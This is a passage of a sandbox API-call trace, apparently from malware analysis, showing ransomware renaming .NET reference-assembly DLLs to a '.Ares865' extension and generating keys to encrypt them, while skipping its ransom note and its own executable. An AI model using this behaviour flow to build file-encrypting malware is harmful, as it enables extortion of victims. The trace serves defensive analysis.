ftLastWriteTime.dwLowDateTime=0x52299040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0123.127] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0123.127] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0123.127] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Microsoft.Build.Conversion.v3.5.dll" | out: lpString1="Microsoft.Build.Conversion.v3.5.dll") returned="Microsoft.Build.Conversion.v3.5.dll" [0123.127] lstrlenW (lpString="Microsoft.Build.Conversion.v3.5.dll") returned 35 [0123.127] lstrlenW (lpString="Ares865") returned 7 [0123.127] lstrcmpiW (lpString1="3.5.dll", lpString2="Ares865") returned -1 [0123.127] lstrlenW (lpString=".dll") returned 4 [0123.127] lstrcmpiW (lpString1="Microsoft.Build.Conversion.v3.5.dll", lpString2=".dll") returned 1 [0123.127] lstrlenW (lpString=".lnk") returned 4 [0123.127] lstrcmpiW (lpString1="Microsoft.Build.Conversion.v3.5.dll", lpString2=".lnk") returned 1 [0123.127] lstrlenW (lpString=".ini") returned 4 [0123.127] lstrcmpiW (lpString1="Microsoft.Build.Conversion.v3.5.dll", lpString2=".ini") returned 1 [0123.127] lstrlenW (lpString=".sys") returned 4 [0123.127] lstrcmpiW (lpString1="Microsoft.Build.Conversion.v3.5.dll", lpString2=".sys") returned 1 [0123.127] lstrlenW (lpString="Microsoft.Build.Conversion.v3.5.dll") returned 35 [0123.128] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll.Ares865") returned 112 [0123.128] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.conversion.v3.5.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.conversion.v3.5.dll.ares865"), dwFlags=0x1) returned 1 [0123.129] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Conversion.v3.5.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.conversion.v3.5.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.129] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=106496) returned 1 [0123.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0123.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0123.130] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.130] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.130] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.131] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a300, lpName=0x0) returned 0x170 [0123.133] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a300) returned 0x190000 [0123.141] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.142] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.142] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.144] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Microsoft.Build.Engine.dll" | out: lpString1="Microsoft.Build.Engine.dll") returned="Microsoft.Build.Engine.dll" [0123.144] lstrlenW (lpString="Microsoft.Build.Engine.dll") returned 26 [0123.144] lstrlenW (lpString="Ares865") returned 7 [0123.144] lstrcmpiW (lpString1="ine.dll", lpString2="Ares865") returned 1 [0123.144] lstrlenW (lpString=".dll") returned 4 [0123.144] lstrcmpiW (lpString1="Microsoft.Build.Engine.dll", lpString2=".dll") returned 1 [0123.144] lstrlenW (lpString=".lnk") returned 4 [0123.144] lstrcmpiW (lpString1="Microsoft.Build.Engine.dll", lpString2=".lnk") returned 1 [0123.144] lstrlenW (lpString=".ini") returned 4 [0123.144] lstrcmpiW (lpString1="Microsoft.Build.Engine.dll", lpString2=".ini") returned 1 [0123.144] lstrlenW (lpString=".sys") returned 4 [0123.144] lstrcmpiW (lpString1="Microsoft.Build.Engine.dll", lpString2=".sys") returned 1 [0123.144] lstrlenW (lpString="Microsoft.Build.Engine.dll") returned 26 [0123.144] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll.Ares865") returned 103 [0123.144] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.engine.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.engine.dll.ares865"), dwFlags=0x1) returned 1 [0123.146] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Engine.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.engine.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.146] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=733184) returned 1 [0123.146] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.147] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.147] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.147] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb3300, lpName=0x0) returned 0x170 [0123.149] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb3300) returned 0xdd0000 [0123.178] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.179] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.179] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.189] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Microsoft.Build.Framework.dll" | out: lpString1="Microsoft.Build.Framework.dll") returned="Microsoft.Build.Framework.dll" [0123.189] lstrlenW (lpString="Microsoft.Build.Framework.dll") returned 29 [0123.189] lstrlenW (lpString="Ares865") returned 7 [0123.189] lstrcmpiW (lpString1="ork.dll", lpString2="Ares865") returned 1 [0123.189] lstrlenW (lpString=".dll") returned 4 [0123.189] lstrcmpiW (lpString1="Microsoft.Build.Framework.dll", lpString2=".dll") returned 1 [0123.189] lstrlenW (lpString=".lnk") returned 4 [0123.189] lstrcmpiW (lpString1="Microsoft.Build.Framework.dll", lpString2=".lnk") returned 1 [0123.189] lstrlenW (lpString=".ini") returned 4 [0123.189] lstrcmpiW (lpString1="Microsoft.Build.Framework.dll", lpString2=".ini") returned 1 [0123.189] lstrlenW (lpString=".sys") returned 4 [0123.189] lstrcmpiW (lpString1="Microsoft.Build.Framework.dll", lpString2=".sys") returned 1 [0123.189] lstrlenW (lpString="Microsoft.Build.Framework.dll") returned 29 [0123.190] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll.Ares865") returned 106 [0123.190] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.framework.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.framework.dll.ares865"), dwFlags=0x1) returned 1 [0123.192] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Framework.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.framework.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.192] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36864) returned 1 [0123.192] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.193] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.193] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.193] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9300, lpName=0x0) returned 0x170 [0123.195] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9300) returned 0x190000 [0123.197] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.198] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.198] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.199] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Microsoft.Build.Utilities.v3.5.dll" | out: lpString1="Microsoft.Build.Utilities.v3.5.dll") returned="Microsoft.Build.Utilities.v3.5.dll" [0123.199] lstrlenW (lpString="Microsoft.Build.Utilities.v3.5.dll") returned 34 [0123.199] lstrlenW (lpString="Ares865") returned 7 [0123.199] lstrcmpiW (lpString1="3.5.dll", lpString2="Ares865") returned -1 [0123.199] lstrlenW (lpString=".dll") returned 4 [0123.199] lstrcmpiW (lpString1="Microsoft.Build.Utilities.v3.5.dll", lpString2=".dll") returned 1 [0123.199] lstrlenW (lpString=".lnk") returned 4 [0123.199] lstrcmpiW (lpString1="Microsoft.Build.Utilities.v3.5.dll", lpString2=".lnk") returned 1 [0123.199] lstrlenW (lpString=".ini") returned 4 [0123.199] lstrcmpiW (lpString1="Microsoft.Build.Utilities.v3.5.dll", lpString2=".ini") returned 1 [0123.199] lstrlenW (lpString=".sys") returned 4 [0123.199] lstrcmpiW (lpString1="Microsoft.Build.Utilities.v3.5.dll", lpString2=".sys") returned 1 [0123.199] lstrlenW (lpString="Microsoft.Build.Utilities.v3.5.dll") returned 34 [0123.200] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll.Ares865") returned 111 [0123.200] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.utilities.v3.5.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.utilities.v3.5.dll.ares865"), dwFlags=0x1) returned 1 [0123.201] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.Build.Utilities.v3.5.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.build.utilities.v3.5.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.201] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94208) returned 1 [0123.202] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.203] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17300, lpName=0x0) returned 0x170 [0123.205] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17300) returned 0x190000 [0123.209] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.210] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.210] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.212] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Microsoft.VisualC.STLCLR.dll" | out: lpString1="Microsoft.VisualC.STLCLR.dll") returned="Microsoft.VisualC.STLCLR.dll" [0123.212] lstrlenW (lpString="Microsoft.VisualC.STLCLR.dll") returned 28 [0123.212] lstrlenW (lpString="Ares865") returned 7 [0123.212] lstrcmpiW (lpString1="CLR.dll", lpString2="Ares865") returned 1 [0123.212] lstrlenW (lpString=".dll") returned 4 [0123.212] lstrcmpiW (lpString1="Microsoft.VisualC.STLCLR.dll", lpString2=".dll") returned 1 [0123.212] lstrlenW (lpString=".lnk") returned 4 [0123.212] lstrcmpiW (lpString1="Microsoft.VisualC.STLCLR.dll", lpString2=".lnk") returned 1 [0123.212] lstrlenW (lpString=".ini") returned 4 [0123.212] lstrcmpiW (lpString1="Microsoft.VisualC.STLCLR.dll", lpString2=".ini") returned 1 [0123.212] lstrlenW (lpString=".sys") returned 4 [0123.212] lstrcmpiW (lpString1="Microsoft.VisualC.STLCLR.dll", lpString2=".sys") returned 1 [0123.212] lstrlenW (lpString="Microsoft.VisualC.STLCLR.dll") returned 28 [0123.213] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll.Ares865") returned 105 [0123.213] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.visualc.stlclr.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.visualc.stlclr.dll.ares865"), dwFlags=0x1) returned 1 [0123.214] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Microsoft.VisualC.STLCLR.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\microsoft.visualc.stlclr.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.215] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41984) returned 1 [0123.215] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.216] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.216] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.216] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa700, lpName=0x0) returned 0x170 [0123.217] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa700) returned 0x190000 [0123.220] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.221] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.221] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.222] lstrcpyW (in: lpString1=0x2cce48a, lpString2="RedistList" | out: lpString1="RedistList") returned="RedistList" [0123.222] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0123.222] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x320fc8 [0123.222] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0123.222] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x522bf1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x522bf1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SubsetList", cAlternateFileName="SUBSET~1")) returned 1 [0123.222] lstrcmpiW (lpString1="SubsetList", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0123.222] lstrcmpiW (lpString1="SubsetList", lpString2="aoldtz.exe") returned 1 [0123.222] lstrcpyW (in: lpString1=0x2cce48a, lpString2="SubsetList" | out: lpString1="SubsetList") returned="SubsetList" [0123.222] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0123.222] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321070 [0123.222] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0123.222] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb65937a4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb65937a4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb65937a4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System.AddIn.Contract.dll", cAlternateFileName="")) returned 1 [0123.222] lstrcmpiW (lpString1="System.AddIn.Contract.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0123.222] lstrcmpiW (lpString1="System.AddIn.Contract.dll", lpString2="aoldtz.exe") returned 1 [0123.223] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.AddIn.Contract.dll" | out: lpString1="System.AddIn.Contract.dll") returned="System.AddIn.Contract.dll" [0123.223] lstrlenW (lpString="System.AddIn.Contract.dll") returned 25 [0123.223] lstrlenW (lpString="Ares865") returned 7 [0123.223] lstrcmpiW (lpString1="act.dll", lpString2="Ares865") returned -1 [0123.223] lstrlenW (lpString=".dll") returned 4 [0123.223] lstrcmpiW (lpString1="System.AddIn.Contract.dll", lpString2=".dll") returned 1 [0123.223] lstrlenW (lpString=".lnk") returned 4 [0123.223] lstrcmpiW (lpString1="System.AddIn.Contract.dll", lpString2=".lnk") returned 1 [0123.223] lstrlenW (lpString=".ini") returned 4 [0123.223] lstrcmpiW (lpString1="System.AddIn.Contract.dll", lpString2=".ini") returned 1 [0123.223] lstrlenW (lpString=".sys") returned 4 [0123.223] lstrcmpiW (lpString1="System.AddIn.Contract.dll", lpString2=".sys") returned 1 [0123.223] lstrlenW (lpString="System.AddIn.Contract.dll") returned 25 [0123.223] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll.Ares865") returned 102 [0123.223] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.contract.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.contract.dll.ares865"), dwFlags=0x1) returned 1 [0123.225] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.contract.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.225] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=45056) returned 1 [0123.225] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.226] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.226] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.226] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb300, lpName=0x0) returned 0x170 [0123.228] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb300) returned 0x190000 [0123.231] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.231] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.231] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.233] lstrcpyW (in: lpString1=0x2cce48a, lpString2="System.AddIn.dll" | out: lpString1="System.AddIn.dll") returned="System.AddIn.dll" [0123.233] lstrlenW (lpString="System.AddIn.dll") returned 16 [0123.233] lstrlenW (lpString="Ares865") returned 7 [0123.233] lstrcmpiW (lpString1="dIn.dll", lpString2="Ares865") returned 1 [0123.233] lstrlenW (lpString=".dll") returned 4 [0123.233] lstrcmpiW (lpString1="System.AddIn.dll", lpString2=".dll") returned 1 [0123.233] lstrlenW (lpString=".lnk") returned 4 [0123.233] lstrcmpiW (lpString1="System.AddIn.dll", lpString2=".lnk") returned 1 [0123.233] lstrlenW (lpString=".ini") returned 4 [0123.233] lstrcmpiW (lpString1="System.AddIn.dll", lpString2=".ini") returned 1 [0123.233] lstrlenW (lpString=".sys") returned 4 [0123.233] lstrcmpiW (lpString1="System.AddIn.dll", lpString2=".sys") returned 1 [0123.233] lstrlenW (lpString="System.AddIn.dll") returned 16 [0123.233] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll.Ares865") returned 93 [0123.233] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.dll.ares865"), dwFlags=0x1) returned 1 [0123.235] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.235] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=163840) returned 1 [0123.235] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.236] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.236] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.236] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x28300, lpName=0x0) returned 0x170 [0123.238] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x28300) returned 0x420000 [0123.245] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.246] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.246] CryptReleaseContext (hProv=0x2f0518, 